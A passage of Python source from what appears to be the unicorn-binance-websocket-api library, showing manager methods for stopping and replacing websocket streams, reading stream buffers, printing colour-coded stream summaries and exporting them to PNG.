return False
elif latest_version == "unknown":
return False
else:
return True
def kill_stream(self, stream_id):
"""
Kill a specific stream
:param stream_id: id of a stream
:type stream_id: str
:return: bool
"""
# stop a specific stream by stream_id
logger.debug(f"BinanceWebSocketApiManager.kill_stream({stream_id}){self.get_debug_log()}")
try:
loop = self.get_event_loop_by_stream_id(stream_id)
try:
if loop.is_running():
logger.debug(f"BinanceWebSocketApiManager.kill_stream({stream_id}) - Closing event_loop "
f"of stream_id {stream_id}")
loop.close()
except AttributeError as error_msg:
logger.debug(f"BinanceWebSocketApiManager.kill_stream({stream_id}) - AttributeError - {error_msg}")
except RuntimeError as error_msg:
logger.debug(f"BinanceWebSocketApiManager.kill_stream({stream_id}) - RuntimeError - {error_msg}")
except RuntimeWarning as error_msg:
logger.debug(f"BinanceWebSocketApiManager.kill_stream({stream_id}) - RuntimeWarning - {error_msg}")
return True
def pop_stream_data_from_stream_buffer(self, stream_buffer_name=False, mode="FIFO"):
"""
Get oldest or latest entry from
`stream_buffer <https://github.com/LUCIT-Systems-and-Development/unicorn-binance-websocket-api/wiki/%60stream_buffer%60>`_
and remove from FIFO/LIFO stack.
:param stream_buffer_name: `False` to read from generic stream_buffer, the stream_id if you used True in
create_stream() or the string name of a shared stream_buffer.
:type stream_buffer_name: bool or str
:param mode: How to read from the `stream_buffer` - "FIFO" (default) or "LIFO".
:type mode: str
:return: stream_data - str, dict or False
"""
if stream_buffer_name is False:
try:
with self.stream_buffer_lock:
if mode.upper() == "FIFO":
stream_data = self.stream_buffer.popleft()
elif mode.upper() == "LIFO":
stream_data = self.stream_buffer.pop()
else:
return False
return stream_data
except IndexError:
return False
else:
try:
with self.stream_buffer_locks[stream_buffer_name]:
if mode.upper() == "FIFO":
stream_data = self.stream_buffers[stream_buffer_name].popleft()
elif mode.upper() == "LIFO":
stream_data = self.stream_buffers[stream_buffer_name].pop()
else:
return False
return stream_data
except IndexError:
return False
except KeyError:
return False
def pop_stream_signal_from_stream_signal_buffer(self):
"""
Get oldest entry from
`stream_signal_buffer <https://github.com/LUCIT-Systems-and-Development/unicorn-binance-websocket-api/wiki/%60stream_signal_buffer%60>`_
and remove from stack/pipe (FIFO stack)
:return: stream_signal - dict or False
"""
try:
with self.stream_signal_buffer_lock:
stream_signal = self.stream_signal_buffer.popleft()
return stream_signal
except IndexError:
return False
def print_stream_info(self, stream_id, add_string="", title=None):
"""
Print all infos about a specific stream, helps debugging :)
:param stream_id: id of a stream
:type stream_id: str
:param add_string: text to add to the output
:type add_string: str
:param title: set to `True` to use curses instead of print()
:type title: bool
:return: bool
"""
restart_requests_row = ""
binance_api_status_row = ""
stream_label_row = ""
status_row = ""
payload_row = ""
symbol_row = ""
dex_user_address_row = ""
last_static_ping_listen_key = ""
stream_info = self.get_stream_info(stream_id)
stream_row_color_prefix = ""
stream_row_color_suffix = ""
if len(add_string) > 0:
add_string = " " + str(add_string) + "\r\n"
try:
if len(self.stream_list[stream_id]['logged_reconnects']) > 0:
logged_reconnects_row = "\r\n logged_reconnects: "
row_prefix = ""
for timestamp in self.stream_list[stream_id]['logged_reconnects']:
logged_reconnects_row += row_prefix + \
datetime.utcfromtimestamp(timestamp).strftime('%Y-%m-%d, %H:%M:%S UTC')
row_prefix = ", "
else:
logged_reconnects_row = ""
except KeyError:
return False
if "running" in stream_info['status']:
stream_row_color_prefix = "\033[1m\033[32m"
stream_row_color_suffix = "\033[0m\r\n"
for reconnect_timestamp in self.stream_list[stream_id]['logged_reconnects']:
if (time.time() - reconnect_timestamp) < 2:
stream_row_color_prefix = "\033[1m\033[33m"
stream_row_color_suffix = "\033[0m\r\n"
status_row = stream_row_color_prefix + " status: " + str(stream_info['status']) + stream_row_color_suffix
elif "crashed" in stream_info['status']:
stream_row_color_prefix = "\033[1m\033[31m"
stream_row_color_suffix = "\033[0m\r\n"
status_row = stream_row_color_prefix + " status: " + str(stream_info['status']) + stream_row_color_suffix
elif "restarting" in stream_info['status']:
stream_row_color_prefix = "\033[1m\033[33m"
stream_row_color_suffix = "\033[0m\r\n"
status_row = stream_row_color_prefix + " status: " + str(stream_info['status']) + stream_row_color_suffix
elif "stopped" in stream_info['status']:
stream_row_color_prefix = "\033[1m\033[33m"
stream_row_color_suffix = "\033[0m\r\n"
status_row = stream_row_color_prefix + " status: " + str(stream_info['status']) + stream_row_color_suffix
try:
if self.restart_requests[stream_id]['status']:
restart_requests_row = " restart_request: " + self.restart_requests[stream_id]['status'] + "\r\n"
except KeyError:
pass
if self.stream_list[stream_id]['markets'] == "!userData":
last_static_ping_listen_key = " last_static_ping_listen_key: " + \
str(self.stream_list[stream_id]['last_static_ping_listen_key']) + "\r\n"
if self.binance_api_status['status_code'] == 200:
binance_api_status_code = str(self.binance_api_status['status_code'])
elif self.binance_api_status['status_code'] == 418:
binance_api_status_code = "\033[1m\033[31m" + str(self.binance_api_status['status_code']) + "\033[0m"
else:
binance_api_status_code = "\033[1m\033[33m" + str(self.binance_api_status['status_code']) + "\033[0m"
binance_api_status_row = " binance_api_status: used_weight=" + str(self.binance_api_status['weight']) + \
", status_code=" + str(binance_api_status_code) + " (last update " + \
str(datetime.utcfromtimestamp(
self.binance_api_status['timestamp']).strftime('%Y-%m-%d, %H:%M:%S UTC')) + \
")\r\n"
current_receiving_speed = str(self.get_human_bytesize(self.get_current_receiving_speed(stream_id), "/s"))
if self.stream_list[stream_id]['symbols'] is not False:
symbol_row = " symbols:" + str(stream_info['symbols']) + "\r\n"
if self.stream_list[stream_id]["payload"]:
payload_row = " payload: " + str(self.stream_list[stream_id]["payload"]) + "\r\n"
if self.stream_list[stream_id]["dex_user_address"] is not False:
dex_user_address_row = " user_address: " + str(self.stream_list[stream_id]["dex_user_address"]) + "\r\n"
if self.stream_list[stream_id]["stream_label"] is not None:
stream_label_row = " stream_label: " + self.stream_list[stream_id]["stream_label"] + "\r\n"
if isinstance(stream_info['ping_interval'], int):
ping_interval = f"{stream_info['ping_interval']} seconds"
else:
ping_interval = stream_info['ping_interval']
if isinstance(stream_info['ping_timeout'], int):
ping_timeout = f"{stream_info['ping_timeout']} seconds"
else:
ping_timeout = stream_info['ping_timeout']
if isinstance(stream_info['close_timeout'], int):
close_timeout = f"{stream_info['close_timeout']} seconds"
else:
close_timeout = stream_info['close_timeout']
if title:
first_row = str(self.fill_up_space_centered(96, f" {title} ", "=")) + "\r\n"
last_row = str(self.fill_up_space_centered(96, f" Powered by {self.get_user_agent()} ", "=")) + "\r\n"
else:
first_row = str(self.fill_up_space_centered(96, f"{self.get_user_agent()} ", "=")) + "\r\n"
last_row = "========================================================================================" \
"=======\r\n"
try:
uptime = self.get_human_uptime(stream_info['processed_receives_statistic']['uptime'])
print(first_row +
" exchange:", str(self.stream_list[stream_id]['exchange']), "\r\n" +
str(add_string) +
" stream_id:", str(stream_id), "\r\n" +
str(stream_label_row) +
" stream_buffer_maxlen:", str(stream_info['stream_buffer_maxlen']), "\r\n" +
" channels (" + str(len(stream_info['channels'])) + "):", str(stream_info['channels']), "\r\n" +
" markets (" + str(len(stream_info['markets'])) + "):", str(stream_info['markets']), "\r\n" +
str(symbol_row) +
" subscriptions: " + str(self.stream_list[stream_id]['subscriptions']) + "\r\n" +
str(payload_row) +
str(status_row) +
str(dex_user_address_row) +
f" ping_interval: {ping_interval}\r\n"
f" ping_timeout: {ping_timeout}\r\n"
f" close_timeout: {close_timeout}\r\n"
" start_time:", str(stream_info['start_time']), "\r\n"
" uptime:", str(uptime),
"since " + str(
datetime.utcfromtimestamp(stream_info['start_time']).strftime('%Y-%m-%d, %H:%M:%S UTC')) +
"\r\n" +
" reconnects:", str(stream_info['reconnects']), logged_reconnects_row, "\r\n" +
str(restart_requests_row) +
str(binance_api_status_row) +
str(last_static_ping_listen_key) +
" last_heartbeat:", str(stream_info['last_heartbeat']), "\r\n"
" seconds_to_last_heartbeat:", str(stream_info['seconds_to_last_heartbeat']), "\r\n"
" kill_request:", str(stream_info['kill_request']), "\r\n"
" stop_request:", str(stream_info['stop_request']), "\r\n"
" has_stopped:", str(stream_info['has_stopped']), "\r\n"
" seconds_since_has_stopped:",
str(stream_info['seconds_since_has_stopped']), "\r\n"
" current_receiving_speed:", str(current_receiving_speed), "\r\n" +
" processed_receives:", str(stream_info['processed_receives_total']), "\r\n" +
" transmitted_payloads:", str(self.stream_list[stream_id]['processed_transmitted_total']), "\r\n" +
" stream_most_receives_per_second:",
str(stream_info['receives_statistic_last_second']['most_receives_per_second']), "\r\n"
" stream_receives_per_second:",
str(stream_info['processed_receives_statistic']['stream_receives_per_second'].__round__(3)), "\r\n"
" stream_receives_per_minute:",
str(stream_info['processed_receives_statistic']['stream_receives_per_minute'].__round__(3)), "\r\n"
" stream_receives_per_hour:",
str(stream_info['processed_receives_statistic']['stream_receives_per_hour'].__round__(3)), "\r\n"
" stream_receives_per_day:",
str(stream_info['processed_receives_statistic']['stream_receives_per_day'].__round__(3)), "\r\n" +
last_row)
except KeyError:
self.print_stream_info(stream_id)
def print_summary(self, add_string="", disable_print=False, title=None):
"""
Print an overview of all streams
:param add_string: text to add to the output
:type add_string: str
:param disable_print: set to `True` to use curses instead of print()
:type disable_print: bool
:param title: set a title (first row) for print_summary output
:type title: str
"""
streams = len(self.stream_list)
active_streams = 0
crashed_streams = 0
restarting_streams = 0
stopped_streams = 0
active_streams_row = ""
restarting_streams_row = ""
stopped_streams_row = ""
all_receives_per_second = 0.0
current_receiving_speed = 0
streams_with_stop_request = 0
stream_rows = ""
crashed_streams_row = ""
binance_api_status_row = ""
received_bytes_per_x_row = ""
streams_with_stop_request_row = ""
stream_buffer_row = ""
highest_receiving_speed_row = f"{str(self.get_human_bytesize(self.receiving_speed_peak['value'], '/s'))} " \
f"(reached at " \
f"{self.get_date_of_timestamp(self.receiving_speed_peak['timestamp'])})"
if len(add_string) > 0:
add_string = " " + str(add_string) + "\r\n"
try:
temp_stream_list = copy.deepcopy(self.stream_list)
except RuntimeError:
return ""
except TypeError:
return ""
for stream_id in temp_stream_list:
stream_row_color_prefix = ""
stream_row_color_suffix = ""
current_receiving_speed += self.get_current_receiving_speed(stream_id)
stream_statistic = self.get_stream_statistic(stream_id)
if self.stream_list[stream_id]['status'] == "running":
active_streams += 1
all_receives_per_second += stream_statistic['stream_receives_per_second']
try:
if self.restart_requests[stream_id]['status'] == "restarted":
stream_row_color_prefix = "\033[1m\033[33m"
stream_row_color_suffix = "\033[0m"
except KeyError:
pass
try:
for reconnect_timestamp in self.stream_list[stream_id]['logged_reconnects']:
if (time.time() - reconnect_timestamp) < 1:
stream_row_color_prefix = "\033[1m\033[31m"
stream_row_color_suffix = "\033[0m"
elif (time.time() - reconnect_timestamp) < 2:
stream_row_color_prefix = "\033[1m\033[33m"
stream_row_color_suffix = "\033[0m"
elif (time.time() - reconnect_timestamp) < 4:
stream_row_color_prefix = "\033[1m\033[32m"
stream_row_color_suffix = "\033[0m"
except KeyError:
pass
elif self.stream_list[stream_id]['status'] == "stopped":
stopped_streams += 1
stream_row_color_prefix = "\033[1m\033[33m"
stream_row_color_suffix = "\033[0m"
elif self.stream_list[stream_id]['status'] == "restarting":
restarting_streams += 1
stream_row_color_prefix = "\033[1m\033[33m"
stream_row_color_suffix = "\033[0m"
elif "crashed" in self.stream_list[stream_id]['status']:
crashed_streams += 1
stream_row_color_prefix = "\033[1m\033[31m"
stream_row_color_suffix = "\033[0m"
if self.stream_list[stream_id]['stream_label'] is not None:
if len(self.stream_list[stream_id]['stream_label']) > 18:
stream_label = str(self.stream_list[stream_id]['stream_label'])[:13] + "..."
else:
stream_label = str(self.stream_list[stream_id]['stream_label'])
else:
stream_label = str(self.stream_list[stream_id]['stream_label'])
stream_rows += stream_row_color_prefix + str(stream_id) + stream_row_color_suffix + " |" + \
self.fill_up_space_right(17, stream_label) + "|" + \
self.fill_up_space_left(8, self.get_stream_receives_last_second(stream_id)) + "|" + \
self.fill_up_space_left(11, stream_statistic['stream_receives_per_second'].__round__(2)) + "|" + \
self.fill_up_space_left(8, self.stream_list[stream_id]['receives_statistic_last_second']['most_receives_per_second']) \
+ "|" + stream_row_color_prefix + \
self.fill_up_space_left(8, len(self.stream_list[stream_id]['logged_reconnects'])) + \
stream_row_color_suffix + "\r\n "
if self.is_stop_request(stream_id, exclude_kill_requests=True) is True and \
self.stream_list[stream_id]['status'] == "running":
streams_with_stop_request += 1
if streams_with_stop_request >= 1:
stream_row_color_prefix = "\033[1m\033[33m"
stream_row_color_suffix = "\033[0m"
streams_with_stop_request_row = stream_row_color_prefix + " streams_with_stop_request: " + \
str(streams_with_stop_request) + stream_row_color_suffix + "\r\n"
if crashed_streams >= 1:
stream_row_color_prefix = "\033[1m\033[31m"
stream_row_color_suffix = "\033[0m"
crashed_streams_row = stream_row_color_prefix + " crashed_streams: " + str(crashed_streams) \
+ stream_row_color_suffix + "\r\n"
total_received_bytes = str(self.get_total_received_bytes()) + " (" + str(
self.get_human_bytesize(self.get_total_received_bytes())) + ")"
try:
received_bytes_per_second = self.get_total_received_bytes() / (time.time() - self.start_time)
received_bytes_per_x_row += str(self.get_human_bytesize(received_bytes_per_second, '/s')) + " (per day " + \
str(((received_bytes_per_second / 1024 / 1024 / 1024) * 60 * 60 * 24).__round__(2))\
+ " gB)"
if self.get_stream_buffer_length() > 50:
stream_row_color_prefix = "\033[1m\033[34m"
stream_row_color_suffix = "\033[0m"
stream_buffer_row += stream_row_color_prefix + " stream_buffer_stored_items: " + \
str(self.get_stream_buffer_length()) + "\r\n"
stream_buffer_row += " stream_buffer_byte_size: " + str(self.get_stream_buffer_byte_size()) + \
" (" + str(self.get_human_bytesize(self.get_stream_buffer_byte_size())) + ")" + \
stream_row_color_suffix + "\r\n"
if active_streams > 0:
active_streams_row = " \033[1m\033[32mactive_streams: " + str(active_streams) + "\033[0m\r\n"
if restarting_streams > 0:
restarting_streams_row = " \033[1m\033[33mrestarting_streams: " + str(restarting_streams) + "\033[0m\r\n"
if stopped_streams > 0:
stopped_streams_row = " \033[1m\033[33mstopped_streams: " + str(stopped_streams) + "\033[0m\r\n"
if self.binance_api_status['weight'] is not None:
if self.binance_api_status['status_code'] == 200:
binance_api_status_code = str(self.binance_api_status['status_code'])
elif self.binance_api_status['status_code'] == 418:
binance_api_status_code = "\033[1m\033[31m" + str(self.binance_api_status['status_code']) + \
"\033[0m"
else:
binance_api_status_code = "\033[1m\033[33m" + str(self.binance_api_status['status_code']) + \
"\033[0m"
binance_api_status_row = " binance_api_status: used_weight=" + \
str(self.binance_api_status['weight']) + \
", status_code=" + str(binance_api_status_code) + " (last update " + \
str(datetime.utcfromtimestamp(
self.binance_api_status['timestamp']).strftime('%Y-%m-%d, %H:%M:%S UTC')) + \
")\r\n"
if title:
first_row = str(self.fill_up_space_centered(96, f" {title} ", "=")) + "\r\n"
last_row = str(self.fill_up_space_centered(96, f" Powered by {self.get_user_agent()} ", "=")) + "\r\n"
else:
first_row = str(self.fill_up_space_centered(96, f"{self.get_user_agent()} ", "=")) + "\r\n"
last_row = "========================================================================================" \
"=======\r\n"
try:
print_text = (
first_row +
" exchange: " + str(self.stream_list[stream_id]['exchange']) + "\r\n" +
" uptime: " + str(self.get_human_uptime(time.time() - self.start_time)) + " since " +
str(self.get_date_of_timestamp(self.start_time)) + "\r\n" +
" streams: " + str(streams) + "\r\n" +
str(active_streams_row) +
str(crashed_streams_row) +
str(restarting_streams_row) +
str(stopped_streams_row) +
str(streams_with_stop_request_row) +
" subscriptions: " + str(self.get_number_of_all_subscriptions()) + "\r\n" +
str(stream_buffer_row) +
" current_receiving_speed: " + str(self.get_human_bytesize(current_receiving_speed, "/s")) + "\r\n" +
" average_receiving_speed: " + str(received_bytes_per_x_row) + "\r\n" +
" highest_receiving_speed: " + str(highest_receiving_speed_row) + "\r\n" +
" total_receives: " + str(self.total_receives) + "\r\n"
" total_received_bytes: " + str(total_received_bytes) + "\r\n"
" total_transmitted_payloads: " + str(self.total_transmitted) + "\r\n" +
" stream_buffer_maxlen: " + str(self.stream_buffer_maxlen) + "\r\n" +
str(binance_api_status_row) +
" process_ressource_usage: cpu=" + str(self.get_process_usage_cpu()) + "%, memory=" +
str(self.get_process_usage_memory()) + ", threads=" + str(self.get_process_usage_threads()) +
"\r\n" + str(add_string) +
" ---------------------------------------------------------------------------------------------\r\n"
" stream_id | stream_label | last | average | peak | recon\r\n"
" ---------------------------------------------------------------------------------------------\r\n"
" " + str(stream_rows) +
"---------------------------------------------------------------------------------------------\r\n"
" all_streams |" +
self.fill_up_space_left(8, self.get_all_receives_last_second()) + "|" +
self.fill_up_space_left(11, all_receives_per_second.__round__(2)) + "|" +
self.fill_up_space_left(8, self.most_receives_per_second) + "|" +
self.fill_up_space_left(8, self.reconnects) + "\r\n" +
last_row
)
if disable_print:
if sys.platform.startswith('Windows'):
print_text = self.remove_ansi_escape_codes(print_text)
return print_text
else:
print(print_text)
except UnboundLocalError:
pass
except ZeroDivisionError:
pass
def print_summary_to_png(self, print_summary_export_path, hight_per_row=12.5):
"""
Create a PNG image file with the console output of `print_summary()`
*LINUX ONLY* It should not be hard to make it OS independent:
https://github.com/LUCIT-Systems-and-Development/unicorn-binance-websocket-api/issues/61
:param print_summary_export_path: If you want to export the output of print_summary() to an image,
please provide a path like "/var/www/html/". `View the Wiki!
<https://github.com/LUCIT-Systems-and-Development/unicorn-binance-websocket-api/wiki/How-to-export-print_summary()-stdout-to-PNG%3F>`_
:type print_summary_export_path: str
:param hight_per_row: set the hight per row for the image hight calculation
:type hight_per_row: int
:return: bool
"""
print_text = self.print_summary(disable_print=True)
# Todo:
# 1. Handle paths right
# 2. Use PythonMagick instead of Linux ImageMagick
with open(print_summary_export_path + "print_summary.txt", 'w') as text_file:
print(self.remove_ansi_escape_codes(print_text), file=text_file)
try:
image_hight = print_text.count("\n") * hight_per_row + 15
except AttributeError:
return False
os.system('convert -size 720x' + str(image_hight) + ' xc:black -font "FreeMono" -pointsize 12 -fill white -annotate '
'+30+30 "@' + print_summary_export_path + 'print_summary.txt' + '" ' +
print_summary_export_path + 'print_summary_plain.png')
os.system('convert ' + print_summary_export_path + 'print_summary_plain.png -font "FreeMono" '
'-pointsize 12 -fill red -undercolor \'#00000080\' -gravity North -annotate +0+5 '
'"$(date)" ' + print_summary_export_path + 'print_summary.png')
return True
@staticmethod
def remove_ansi_escape_codes(text):
"""
Remove ansi excape codes from the text string!
:param text: str
:return:
"""
text = str(text)
text = text.replace("\033[1m\033[31m", "")
text = text.replace("\033[1m\033[32m", "")
text = text.replace("\033[1m\033[33m", "")
text = text.replace("\033[1m\033[34m", "")
text = text.replace("\033[0m", "")
return text
def replace_stream(self,
stream_id,
new_channels,
new_markets,
new_stream_label=None,
new_stream_buffer_name=False,
new_api_key=False,
new_api_secret=False,
new_symbols=False,
new_output="raw_data",
new_ping_interval=20,
new_ping_timeout=20,
new_close_timeout=10,
new_stream_buffer_maxlen=None):
"""
Replace a stream
If you want to start a stream with a new config, its recommended, to first start a new stream with the new
settings and close the old stream not before the new stream received its first data. So your data will stay
consistent.
:param stream_id: id of the old stream
:type stream_id: str
:param new_channels: the new channel list for the stream
:type new_channels: str, tuple, list, set
:param new_markets: the new markets list for the stream
:type new_markets: str, tuple, list, set
:param new_stream_label: provide a stream_label to identify the stream
:type new_stream_label: str
:param new_stream_buffer_name: If `False` the data is going to get written to the default stream_buffer,
set to `True` to read the data via `pop_stream_data_from_stream_buffer(stream_id)` or
provide a string to create and use a shared stream_buffer and read it via
`pop_stream_data_from_stream_buffer('string')`.
:type new_stream_buffer_name: bool or str
:param new_api_key: provide a valid Binance API key
:type new_api_key: str
:param new_api_secret: provide a valid Binance API secret
:type new_api_secret: str
:param new_symbols: provide the symbols for isolated_margin user_data streams
:type new_symbols: str
:return: new stream_id
:param new_output: set to "dict" to convert the received raw data to a python dict, set to "UnicornFy" to convert
with `UnicornFy <https://github.com/LUCIT-Systems-and-Development/unicorn-fy>`_ - otherwise the output
remains unchanged and gets delivered as received from the endpoints
:type new_output: str
:param new_ping_interval: Once the connection is open, a `Ping frame` is sent every
`ping_interval` seconds. This serves as a keepalive. It helps keeping
the connection open, especially in the presence of proxies with short
timeouts on inactive connections. Set `ping_interval` to `None` to
disable this behavior. (default: 20)
This parameter is passed through to the `websockets.client.connect()
<https://websockets.readthedocs.io/en/stable/api.html?highlight=ping_interval#websockets.client.connect>`_
:type new_ping_interval: int or None
:param new_ping_timeout: If the corresponding `Pong frame` isn't received within
`ping_timeout` seconds, the connection is considered unusable and is closed with
code 1011. This ensures that the remote endpoint remains responsive. Set
`ping_timeout` to `None` to disable this behavior. (default: 20)
This parameter is passed through to the `websockets.client.connect()
<https://websockets.readthedocs.io/en/stable/api.html?highlight=ping_interval#websockets.client.connect>`_
:type new_ping_timeout: int or None
:param new_close_timeout: The `close_timeout` parameter defines a maximum wait time in seconds for
completing the closing handshake and terminating the TCP connection. (default: 10)
This parameter is passed through to the `websockets.client.connect()
<https://websockets.readthedocs.io/en/stable/api.html?highlight=ping_interval#websockets.client.connect>`_
:type new_close_timeout: int or None
:param new_stream_buffer_maxlen: Set a max len for the `stream_buffer`. Only used in combination with a non generic
`stream_buffer`. The generic `stream_buffer` uses always the value of
`BinanceWebSocketApiManager()`.
:type new_stream_buffer_maxlen: int or None
:return: new_stream_id or 'False'
"""
# starting a new socket and stop the old stream not before the new stream received its first record
new_stream_id = self.create_stream(new_channels,
new_markets,
new_stream_label,
new_stream_buffer_name,
new_api_key,
new_api_secret,
new_symbols,
new_output,
new_ping_interval,
new_ping_timeout,
new_close_timeout,
new_stream_buffer_maxlen)
if self.wait_till_stream_has_started(new_stream_id):
self.stop_stream(stream_id)
return new_stream_id
def run(self):
"""
This method overloads `threading.run()` and starts management threads
"""
thread_frequent_checks = threading.Thread(target=self._frequent_checks, name="frequent_checks")
thread_frequent_checks.start()
thread_keepalive_streams = threading.Thread(target=self._keepalive_streams, name="keepalive_streams")
thread_keepalive_streams.start()
def set_private_dex_config(self, binance_dex_user_address):
"""
Set binance_dex_user_address
Is going to be the default user_address, once the websocket is created with this default value, its not possible
to change it. If you plan to use different user_address its recommended to not use this method! Just provide the
user_address with create_stream() in the market parameter.
:param binance_dex_user_address: Binance DEX user address
:type binance_dex_user_address: str
"""
self.dex_user_address = binance_dex_user_address
def set_heartbeat(self, stream_id):
"""
Set heartbeat for a specific thread (should only be done by the stream itself)
"""
logger.debug("BinanceWebSocketApiManager.set_heartbeat(" + str(stream_id) + ")")
try:
self.stream_list[stream_id]['last_heartbeat'] = time.time()
self.stream_list[stream_id]['status'] = "running"
except KeyError:
pass
def set_ringbuffer_error_max_size(self, max_size):
"""
How many error messages should be kept in the ringbuffer?
:param max_size: Max entries of error messages in the ringbuffer.
:type max_size: int
:return: bool
"""
self.ringbuffer_error_max_size = int(max_size)
def set_ringbuffer_result_max_size(self, max_size):
"""
How many result messages should be kept in the ringbuffer?
:param max_size: Max entries of result messages in the ringbuffer.
:type max_size: int
:return: bool
"""
self.ringbuffer_result_max_size = int(max_size)
def set_socket_is_not_ready(self, stream_id: str) -> None:
"""
Set `socket_is_ready` for a specific stream to False.
:param stream_id: id of the stream
:type stream_id: str
"""
logger.debug(f"BinanceWebSocketApiManager.set_socket_is_not_ready({stream_id}){self.get_debug_log()}")
self.socket_is_ready[stream_id] = False
def set_socket_is_ready(self, stream_id: str) -> None:
"""
Set `socket_is_ready` for a specific stream to True.
:param stream_id: id of the stream
:type stream_id: str
"""
logger.debug(f"BinanceWebSocketApiManager.set_socket_is_ready({stream_id}){self.get_debug_log()}")
self.socket_is_ready[stream_id] = True
def set_stream_label(self, stream_id, stream_label=None):
"""
Set a stream_label by stream_id
:param stream_id: id of the stream
:type stream_id: str
:param stream_label: stream_label to set
:type stream_label: str
"""
self.stream_list[stream_id]['stream_label'] = stream_label
def set_keep_max_received_last_second_entries(self, number_of_max_entries):
"""
Set how much received_last_second entries are stored till they get deleted!
:param number_of_max_entries: number of entries to keep in list
:type number_of_max_entries: int
"""
self.keep_max_received_last_second_entries = number_of_max_entries
def set_restart_request(self, stream_id):
"""
Set a restart request for a specific stream
:param stream_id: id of the old stream
:type stream_id: str
"""
logger.debug(f"BinanceWebSocketApiManager.set_restart_request({stream_id}){self.get_debug_log()}")
try:
if self.restart_requests[stream_id]['last_restart_time'] + self.restart_timeout > time.time():
logger.debug(f"BinanceWebSocketApiManager.set_restart_request() - last_restart_time timeout, "
f"initiate new")
return False
except KeyError:
pass
logger.debug(f"BinanceWebSocketApiManager.set_restart_request() - creating new request")
self.restart_requests[stream_id] = {'status': "new",
'initiated': None}
return True
def split_payload(self, params, method, max_items_per_request=350):
"""
Sending more than 8000 chars via websocket.send() leads to a connection loss, 350 list elements is a good limit
to keep the payload length under 8000 chars and avoid reconnects
:param params: params of subscribe payload
:type params: list
:param method: SUBSCRIBE or UNSUBSCRIBE
:type method: str
:param max_items_per_request: max size for params, if more it gets splitted
:return: list or False
"""
if self.is_exchange_type('cex'):
count_items = 0
add_params = []
payload = []
for param in params:
add_params.append(param)
count_items += 1
if count_items > max_items_per_request:
add_payload = {"method": method,
"params": add_params,
"id": self.get_request_id()}
payload.append(add_payload)
count_items = 0
add_params = []
if len(add_params) > 0:
add_payload = {"method": method,
"params": add_params,
"id": self.get_request_id()}
payload.append(add_payload)
return payload
else:
return False
elif self.is_exchange_type('dex'):
pass
else:
return False
def start_monitoring_api(self, host='127.0.0.1', port=64201, warn_on_update=True):
"""
Start the monitoring API server
Take a look into the
`Wiki <https://github.com/LUCIT-Systems-and-Development/unicorn-binance-websocket-api/wiki/UNICORN-Monitoring-API-Service>`_
to see how this works!
:param host: listening ip address, use 0.0.0.0 or a specific address (default: 127.0.0.1)
:type host: str
:param port: listening port number (default: 64201)
:type port: int
:param warn_on_update: set to `False` to disable the update warning
:type warn_on_update: bool
"""
thread = threading.Thread(target=self._start_monitoring_api_thread,
args=(host, port, warn_on_update),
name="monitoring_api")
thread.start()
return True
def stop_manager_with_all_streams(self):
"""
Stop the BinanceWebSocketApiManager with all streams and management threads
"""
logger.info("BinanceWebSocketApiManager.stop_manager_with_all_streams() - Stopping "
"unicorn_binance_websocket_api_manager " + self.version + " ...")
for stream_id in self.stream_list:
self.stop_stream(stream_id)
# stop monitoring API services
self.stop_monitoring_api()
# send signal to all threads
self.stop_manager_request = True
def stop_monitoring_api(self):
"""
Stop the monitoring API service
:return: bool
"""
try:
if not isinstance(self.monitoring_api_server, bool):
self.monitoring_api_server.stop()
return True
except AttributeError as error_msg:
logger.info("BinanceWebSocketApiManager.stop_monitoring_api() - can not execute "
"self.monitoring_api_server.stop() - info: " + str(error_msg))
return False
def stop_stream(self, stream_id):
"""
Stop a specific stream
:param stream_id: id of a stream
:type stream_id: str
:return: bool
"""
# stop a specific stream by stream_id
logger.info(f"BinanceWebSocketApiManager.stop_stream({stream_id}){self.get_debug_log()}")
self.stream_is_stopping(stream_id)
try:
self.stream_list[stream_id]['stop_request'] = True
except KeyError:
return False
try:
del self.restart_requests[stream_id]
except KeyError:
pass
self.delete_listen_key_by_stream_id(stream_id)
try:
loop = self.get_event_loop_by_stream_id(stream_id)
try:
if loop.is_running():
logger.debug(f"BinanceWebSocketApiManager.stop_stream({stream_id}) - Closing event_loop "
f"of stream_id {stream_id}")
loop.close()
except AttributeError as error_msg:
logger.debug(f"BinanceWebSocketApiManager.stop_stream({stream_id}) - AttributeError - {error_msg}")
except RuntimeError as error_msg:
logger.debug(f"BinanceWebSocketApiManager.stop_stream({stream_id}) - RuntimeError - {error_msg}")
except RuntimeWarning as error_msg:
logger.debug(f"BinanceWebSocketApiManager.stop_stream({stream_id}) - RuntimeWarning - {error_msg}")
return True
def stop_stream_as_crash(self, stream_id):
"""
Stop a specific stream with 'crashed' status
:param stream_id: id of a stream
:type stream_id: str
:return: bool
"""
# stop a specific stream by stream_id
logger.critical(f"BinanceWebSocketApiManager.stop_stream_as_crash({stream_id}){self.get_debug_log()}")
try:
del self.restart_requests[stream_id]
except KeyError:
pass
try:
self.stream_list[stream_id]['crash_request'] = True
except KeyError:
return False
try:
loop = self.get_event_loop_by_stream_id(stream_id)
try:
if loop.is_running():
logger.debug(f"BinanceWebSocketApiManager.stop_stream_as_crash({stream_id}) - Closing event_loop "
f"of stream_id {stream_id}")
loop.close()
except AttributeError as error_msg:
logger.debug(f"BinanceWebSocketApiManager.stop_stream_as_crash({stream_id}) - AttributeError - "
f"{error_msg}")
except RuntimeError as error_msg:
logger.debug(f"BinanceWebSocketApiManager.stop_stream_as_crash({stream_id}) - RuntimeError - {error_msg}")
except RuntimeWarning as error_msg:
logger.debug(f"BinanceWebSocketApiManager.stop_stream_as_crash({stream_id}) - RuntimeWarning - {error_msg}")
return True
def stream_is_crashing(self, stream_id, error_msg=False):
"""
If a stream can not heal itself in cause of wrong parameter (wrong market, channel type) it calls this method
:param stream_id: id of a stream
:type stream_id: str
:param error_msg: Error msg to add to the stream status!
:type error_msg: str
"""
logger.critical(f"BinanceWebSocketApiManager.stream_is_crashing({stream_id}){self.get_debug_log()}")
if self.stream_list[stream_id]['last_stream_signal'] is not None and \
self.stream_list[stream_id]['last_stream_signal'] != "DISCONNECT":
self.process_stream_signals("DISCONNECT", stream_id)
self.stream_list[stream_id]['last_stream_signal'] = "DISCONNECT"
self.stream_list[stream_id]['has_stopped'] = time.time()
self.stream_list[stream_id]['status'] = "crashed"
self.set_socket_is_ready(stream_id) # necessary to release `create_stream()`
if error_msg:
self.stream_list[stream_id]['status'] += " - " + str(error_msg)
def stream_is_stopping(self, stream_id):
"""
Streams report with this call their shutdowns
:param stream_id: id of a stream
:type stream_id: str
:return: bool
"""
